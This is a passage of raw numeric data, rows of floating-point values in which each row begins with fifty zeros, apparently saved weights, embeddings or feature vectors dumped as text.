-1.094, 1.975, 0.04102, -0.3203, -0.573, 0.2284, 0.1986, -0.518, -0.7593, 0.1368, -0.8047, 1.227, 1.216, 0.2717, 0.9775], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0592, 0.515, 0.2391, -0.254, -0.0638, -0.243, 0.1393, -4.484, -0.7725, 0.2034, -0.3574, -0.5073, 0.1371, -3.871, -0.1265, -1.81, -0.054, 0.1715, -0.2993, -0.02986, -0.01842, -0.7686, -0.0386, 0.624, 0.02658, 0.2052, 0.199, 0.2015, -0.07874, -2.158, -1.199, 0.1611, -0.0799, 0.332, 0.2145, 0.07135, 0.574, -0.0412, -0.08887, -0.3523, -0.1562, 0.03757, -0.4849, -0.1816, -0.004436, 0.1979, -2.096, 0.03436, 0.1345, -0.2559], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.077, 0.3235, -0.1229, -0.283, 0.01266, 0.1287, 0.1332, 0.3232, 0.278, -0.0412, -0.177, -0.323, -0.435, 1.111, -0.12103, 0.04907, 0.4639, -0.1976, 0.62, 0.0499, 0.10767, 0.2822, -0.7393, 1.277, 0.01205, 0.333, -0.606, -0.2908, -0.1186, 0.2095, 0.2224, -0.04736, -0.595, 0.172, -0.1808, 0.7104, 1.393, -0.02988, -0.2751, 0.1567, -0.1687, -0.14, -0.263, -0.9434, 0.02678, 0.2515, 0.2227, -0.1987, -0.1763, 0.01875], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.09094, 0.4463, -0.123, 0.3286, -0.0476, -0.1814, 0.502, -0.978, 0.0276, 0.623, 0.277, -0.0385, -0.3323, 0.629, 0.5186, -0.3252, -0.553, 0.2734, 0.337, 0.01276, -0.2876, 0.0477, 0.1838, 1.164, 0.0006814, 0.1548, 0.1482, 0.382, 0.04318, 0.3865, -0.7036, -0.182, -0.2815, -1.664, -1.693, 0.0528, -0.3186, 0.04974, 0.1266, 0.764, -0.6855, 0.04602, -0.176, -0.111, -0.4282, 0.5986, 0.1731, 0.6006, -0.287, 0.3772], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2542, 0.02557, 1.008, -0.686, -0.4023, -0.9785, 0.1736, -0.2222, 0.05685, 0.0609, -0.3977, -0.3354, 0.3416, -0.01637, -0.2708, 0.04086, 0.0192, 0.07263, 0.544, -0.00943, 0.5015, -0.1869, -0.1644, 0.9155, 0.0005465, -0.8857, 0.1026, -0.01428, -0.02077, -0.5186, -0.2042, 0.3494, -0.5566, -0.5127, -0.4321, 0.009834, 0.9463, -0.005184, -0.1985, -0.2374, 0.4932, -0.4373, 0.0479, -0.603, 0.3625, -0.3997, -0.1484, 0.01091, -0.4514, -0.994], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4597, 0.5205, -0.1213, -0.7803, 0.1805, 0.02328, -0.2683, -0.5493, -0.1833, 0.535, 1.141, -1.056, -0.7, 0.6113, 0.2394, 0.1699, -0.06305, -2.045, 0.4517, -0.04675, 0.288, 0.0466, -0.763, 0.5234, 0.04572, 1.232, -3.32, 0.2632, 0.05145, 0.2632, 0.4834, -0.1472, -0.0885, -0.2776, -6.465, 0.2803, -1.282, 0.03702, 0.664, 0.3098, -0.4631, -2.338, 0.2334, 0.3926, -0.3792, -0.06073, 0.2355, 0.0953, -2.969, 0.07434], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.286, -0.8716, 0.888, -0.03644, -0.512, -0.002035, 0.01897, 0.2983, 0.2008, -0.0919, -0.5337, -1.114, -0.0766, -0.639, 0.966, 0.1421, -0.1902, 0.2417, -1.434, 0.0494, -0.134, -0.4092, -0.6523, -0.619, -0.01784, -0.8687, -0.4949, -0.3125, 0.3464, -0.469, -0.435, 0.7046, 0.766, -0.8525, -0.887, -0.286, 0.681, 0.04385, 0.488, -0.557, 0.303, -0.317, 0.1515, -2.43, -0.192, -0.6543, 0.4512, 1.332, -1.389, -0.3857], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.358, 0.749, -0.5103, -0.217, -0.851, 0.764, -0.05328, 0.621, 0.09863, 0.0637, 1.309, 0.1503, -0.4146, -0.3196, -0.8154, 0.471, 0.2001, 0.8447, -0.1958, -0.02063, -0.6, -0.067, 0.6055, -1.097, -0.00884, 0.613, 0.2585, -0.04776, -0.755, 0.0536, 0.276, -0.5806, -0.869, 2.04, -1.609, 0.11066, -0.0549, -0.03168, -0.491, -0.187, -0.794, 1.044, -0.05484, -1.204, -0.775, -0.0743, 0.585, -0.7627, 0.544, -0.3916], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0433, -0.4163, 0.1008, -0.1407, -0.0807, 0.2191, 0.2068, 0.0664, -0.1965, 0.2798, 0.1814, -0.2463, -0.219, -0.0522, -0.1426, 0.1259, -0.1252, -0.5283, -0.2163, -0.03458, -0.0947, 0.1876, 0.3228, -0.8477, -0.0008225, -0.2566, -0.1676, -0.3472, -0.0964, 0.1608, -0.549, -0.2386, -0.09143, 0.5713, -0.535, 0.11127, 0.4058, -0.01198, 0.0881, 0.06168, 0.0905, 0.0357, -0.08936, -1.876, 0.1412, -0.09894, 0.07965, -0.483, 0.1351, -0.1105], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.41, -1.625, -0.8267, 0.1311, 0.833, -1.075, 0.188, -0.01584, -1.3125, -1.323, -1.198, -1.695, 0.1656, 0.08136, -2.914, 0.2394, -0.2305, 0.6606, 0.2048, 0.03372, 0.641, -0.2003, -0.2275, -2.623, 0.00863, -0.5586, -0.387, -0.1405, -0.512, 0.885, 0.9043, 0.2925, 0.07227, 2.5, -0.8086, 2.094, -2.021, -0.0174, -1.586, 0.7256, 1.336, -2.592, -1.014, -2.652, 0.8687, 0.555, -3.023, -0.4062, -1.535, 0.3232], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.10815, -0.301, 0.1984, -1.152, 0.00948, 0.383, 1.008, 0.11536, -0.0281, 0.779, 0.5566, -1.017, -0.02216, -2.479, 0.5415, 0.1198, -0.593, -1.835, 0.7, 0.04706, 0.1948, -0.141, -1.206, 0.646, 0.04657, -0.1925, -0.505, -0.5415, 0.02715, -0.4045, 0.675, -0.1901, -0.6484, -0.8647, -0.04803, 0.721, 1.755, -0.02292, 0.575, -0.3223, 0.3481, -0.4053, -0.4304, -0.7236, -2.047, 0.3208, 0.272, 0.2827, 1.022, 0.3157], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2102, 0.3772, -0.4038, -0.2383, 0.01909, 0.433, 0.1594, -1.33, 0.02023, 0.3508, 0.3926, 0.3901, -0.12115, -2.125, -0.1937, 0.1399, -0.151, -0.12177, 0.1371, 0.04727, -0.02942, -0.3435, 0.588, -0.644, 0.02954, 0.1893, 0.2605, 0.2537, -0.6396, -0.1791, -0.1384, -0.3623, -0.553, -0.1299, -0.0658, 0.09595, 0.1874, -0.03955, 0.2773, 0.0442, -0.1653, 0.3694, 0.03308, 0.527, -0.4146, -0.632, 0.517, -0.3828, 0.11237, 0.1749], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.06033, 0.0235, 0.2688, 0.575, -0.741, 0.4973, 0.2969, -2.045, -0.708, 0.6133, -1.046, 0.3096, 0.06155, -1.98, 0.329, 0.5234, -0.2751, 0.4075, 0.4407, 0.00952, -1.013, -0.1826, 0.10754, 0.12286, -0.0426, 0.3804, -0.1785, 0.014755, -0.138, -1.227, -0.289, -0.01859, -0.2734, 1.578, -0.0688, 0.06934, 0.615, 0.010574, -0.0698, -0.1624, 0.3472, 0.2059, -0.2815, -1.023, -0.312, -0.2091, 0.11456, 0.03238, -0.114, 0.01637], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00443, 0.84, -0.01004, 0.3213, -0.3052, -0.2188, 0.00436, -0.884, -0.1289, 0.1886, 0.198, 0.2693, 0.1595, 0.4707, -0.1456, 0.2773, -0.982, 0.4907, -0.631, -0.03125, 0.11816, -0.11475, 0.72, -0.056, -0.02571, 0.2467, 0.3857, 0.2834, 0.03265, -0.3206, -3.865, 0.1813, 0.8765, 0.3064, 0.5054, -0.674, -2.645, 0.02725, 0.2563, -1.022, -0.251, -0.02863, 0.2974, 2.363, -0.185, -0.5864, -0.0736, 0.544, -0.2084, -0.2925], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -3.02, 1.566, -3.146, -6.008, 1.688, -3.467, 1.368, 1.621, -0.788, -0.913, -3.46, -2.008, 0.95, -3.414, -13.17, 1.452, -2.133, -4.895, 1.285, -0.03177, 1.235, 0.2344, -2.643, 0.2383, -0.02342, -2.791, -2.041, 0.263, -0.1735, -2.11, -5.37, 1.476, -0.894, 1.996, -4.51, 1.346, -6.562, -0.0168, 1.007, -5.723, -0.0361, -7.03, -0.5415, -8.06, 0.2059, -2.016, -2.729, 0.3755, -7.09, -0.9956], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2306, 0.7812, -0.306, -0.2258, -0.5615, -1.46, -0.409, 0.12427, -0.07007, -0.1133, -2.633, 0.3147, 0.3054, -2.68, -0.7173, -1.061, 0.1975, 0.096, 0.6567, -0.01131, 0.011246, 0.4468, -0.3943, -0.4832, 0.02742, -0.0933, -0.0459, -0.1504, 0.0939, 0.2551, -9.34, -0.06006, -0.5913, 0.648, 0.2427, -0.0971, -1.19, -0.04352, -0.09204, -0.3098, -0.2037, -0.5664, 0.104, -3.393, 0.586, 0.02869, -0.2573, 0.2484, 0.4443, 0.04465], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0688, -0.6836, 0.2864, -0.677, 0.11237, -0.527, 0.2101, -1.302, 0.04153, 0.5044, -0.3936, -0.1538, -0.3513, -0.2375, 0.304, -0.0579, -0.5327, 0.5117, -0.5107, -0.03058, 0.00833, 0.1656, -0.1237, 0.3203, 0.01252, -0.789, -0.2338, -0.1139, 0.0768, -0.1501, 0.1897, 0.11993, -0.3152, 0.4346, -0.4802, 0.831, -0.878, 0.02423, 0.3567, -0.3364, -0.01886, -0.1709, 0.1153, -2.744, 0.2844, 0.06046, 0.3389, 0.4246, -0.02339, 0.2151], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4146, 0.1362, -0.0601, 0.3396, 0.05142, -0.271, -0.243, 0.3704, 0.1716, 0.2354, 0.1034, -0.4111, -0.0852, -3.932, 0.6377, -0.76, -0.1061, 0.2393, 0.0796, 0.00498, -0.514, 0.1649, 0.26, 0.3298, -0.005924, 0.683, -0.5044, 0.1625, -0.11084, -0.0598, 1.436, -0.2756, -0.01101, 0.1422, 0.02017, -0.3325, -1.348, 0.0476, 0.3882, -0.5713, -0.301, -0.1818, 0.08636, -2.037, 0.1423, -0.1588, -0.2148, -0.1921, 0.1063, 0.02852], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3247, 0.9165, 0.6216, 0.3577, 0.03452, -0.2761, -0.2012, 0.256, 0.1555, 0.1528, -0.06165, 0.09784, 0.1656, -1.778, 0.4568, -0.4392, 0.0387, 0.09937, 0.4631, -0.04483, -0.26, 0.156, 0.0991, 0.1202, -0.007835, 0.10016, 0.3716, 0.0494, 0.41, -0.3735, -0.877, 0.2832, 0.02834, -0.4678, 0.632, -0.4285, 0.5327, -0.004097, -0.2416, -0.15, 0.0774, -0.1871, 0.2432, 1.099, -0.275, 0.0731, -0.2878, 0.3145, 0.64, -0.1787], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -4.09, -1.809, 1.842, -1.126, 0.5303, 0.2023, 0.3762, -0.8677, -1.777, -2.098, -0.4575, -0.7373, 0.586, 0.10504, 1.729, 0.693, -1.317, 1.201, -0.3748, -0.0207, -0.3696, 0.4058, -0.9062, -4.95, -0.03815, -2.87, -1.096, 0.682, -0.2178, -0.5063, -0.2524, 0.785, -0.353, 3.352, -2.076, -1.452, -0.0877, 0.04953, 1.112, -2.725, -0.1791, -0.7075, 0.2637, 0.2153, -3.643, -0.2646, -1.415, 1.377, -1.853, -0.781], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3833, -0.02841, 0.08716, 0.09314, 0.1648, -0.364, 0.6514, -1.482, 0.01723, -1.825, 0.209, -1.352, -0.4336, -0.2399, 0.1262, 0.05307, 0.2345, -0.211, -1.25, 0.007072, 0.483, -0.8525, -0.1376, 0.866, -0.03674, -0.7812, -0.583, 0.582, -0.3928, -0.7734, 0.812, -0.5503, -0.2756, 0.632, -0.996, 0.6533, -0.2988, 0.01559, -0.5557, -0.812, 0.905, -1.694, 0.1559, -0.2773, 0.2124, -0.3733, 0.9204, -0.0701, -0.706, -0.6387], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.472, 0.837, -0.3308, -1.679, -0.2443, -0.4902, -0.173, -1.393, -0.5654, -1.067, -0.3154, 0.2452, 0.2617, 2.049, -0.9277, -1.979, 0.1511, -0.3008, -0.012436, 0.03906, 0.3442, -0.3425, -1.1045, 0.639, 0.04312, -0.335, -0.3933, 0.1962, -0.2319, 0.5024, -2.348, 0.10004, -0.3044, -0.3398, 0.6543, 0.1572, -0.4783, 0.0001484, 0.1891, -0.001793, 0.004566, 0.0614, -0.01662, -0.8657, 0.659, -0.642, 0.1868, 0.1376, -0.5264, 0.0994], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2903, 0.3057, 0.8643, -0.9087, 0.001756, 0.2086, -0.863, 0.5137, 0.2437, 0.3171, 0.4268, -0.8667, 0.2874, -0.3157, -0.3223, -0.561, 0.03265, -0.1437, -0.1368, 0.0312, 0.010895, 0.02956, -0.0177, 2.176, -0.01102, -0.2698, 0.03772, 0.279, 0.02757, -0.2494, 0.008064, -0.2263, -0.6157, -0.4915, 0.5757, 0.0983, -0.0836, -0.01209, 0.7305, -0.1699, 0.02881, -0.0834, -0.1295, -1.447, 0.1484, 0.339, -0.5024, 0.0558, -0.0847, -0.3425], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2915, 0.97, 0.3232, -0.6333, 0.1907, 0.937, 1.078, -4.59, 0.1053, 0.7026, 0.10114, 0.4236, -0.577, -7.02, -1.088, -0.967, -1.807, -0.702, 0.3384, -0.02473, 0.599, -0.717, 1.337, 1.598, 0.0344, -0.753, 0.738, 0.5054, 0.315, -1.471, -7.406, -0.2266, -0.4695, 1.079, -2.383, -0.814, 2.732, 0.01715, 0.2827, 0.5225, 0.01575, 0.516, 1.111, -15.95, 0.741, 0.3887, -0.8677, 0.5293, -0.4014, -2.7e-06], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.11456, 0.10596, -0.1561, 0.57, 0.0791, 0.02495, -0.1442, -5.15, -0.2761, -0.2426, 0.823, -0.0894, 0.09924, 0.11646, 0.0494, 1.183, 0.3093, 0.6953, -0.3071, 0.047, -0.2493, 0.2288, 0.02953, -0.03214, 0.01709, 0.1775, -0.1587, -0.072, 0.2517, -0.3228, -0.87, -0.06836, 0.069, 1.1045, 0.6587, 0.1417, -0.6426, 0.02275, 0.3005, -0.6133, 0.0616, 0.3508, 0.4214, -1.809, -0.3625, 0.1562, 0.81, 0.4946, 0.363, 0.1349], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3054, -1.368, -0.897, 0.1632, -0.05377, -1.768, 0.1986, 0.96, -1.314, -0.3748, -0.3796, -0.02885, 0.679, -1.086, -1.005, 0.2426, -0.0888, 0.2822, 1.39, 0.01897, -0.1305, -0.2227, 0.04395, -0.6577, -0.0402, -0.1378, 0.1854, -0.103, -0.525, 0.792, -2.309, -0.1306, -0.2106, -2.225, -0.2247, 1.789, -0.52, -0.02718, 0.305, -3.105, -0.00898, 1.136, -0.08875, 0.9873, -5.09, -0.4507, 0.3113, -0.3901, 0.324, 0.3289], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01912, -0.4185, 0.4524, -0.2385, -0.1127, -0.2352, 0.2128, -1.096, 0.363, 0.1176, -0.1827, -0.09753, -0.01613, -0.3674, -0.0915, 0.1016, 0.0974, -0.5366, 0.1239, 0.02193, 0.2778, -0.2252, -0.1117, 0.7603, 0.02156, -0.11633, -0.04678, -0.3137, -0.1954, 0.0396, -0.2944, -0.00553, -0.2249, 0.06247, -0.3013, -0.261, 0.6743, 0.02376, 0.01689, 0.006226, -0.1656, -0.1055, -0.1615, 0.6177, 0.1819, -0.2343, -0.2404, -0.2473, -0.3657, -0.09393], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.091, 0.2566, -0.609, 0.1831, 0.04733, -0.7593, -0.1556, -0.1194, -0.4922, 0.2229, 1.013, -0.433, -1.45, -0.3005, 0.4607, 0.2703, 0.1632, -1.076, -0.1677, -0.003279, 0.353, 0.4556, -1.268, 1.358, 0.04663, 0.124, -0.93, -0.7817, -0.5093, 0.1431, 0.4143, -0.4055, -0.05917, 0.447, 0.808, 0.562, -0.2502, -0.01169, 0.1431, 0.03616, -0.126, -0.4087, -0.04987, -2.154, 0.7627, 0.1257, 0.3618, -0.5845, 1.014, -0.315], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.02344, 0.7256, -0.385, -0.3064, 0.3694, -0.7393, 0.5264, -0.7725, -0.1715, 0.919, 0.3506, 0.01889, 0.03296, -0.138, -0.6123, 1.415, -0.791, -0.3955, 0.214, 0.02083, 0.1428, -0.008286, -0.1982, -0.9307, -0.007812, -0.583, 0.3618, -0.1271, 0.2001, 0.2362, 0.593, -0.0179, -0.2073, -0.5557, -0.2379, -0.04346, -2.248, -0.04724, 0.5693, -0.359, 0.04895, 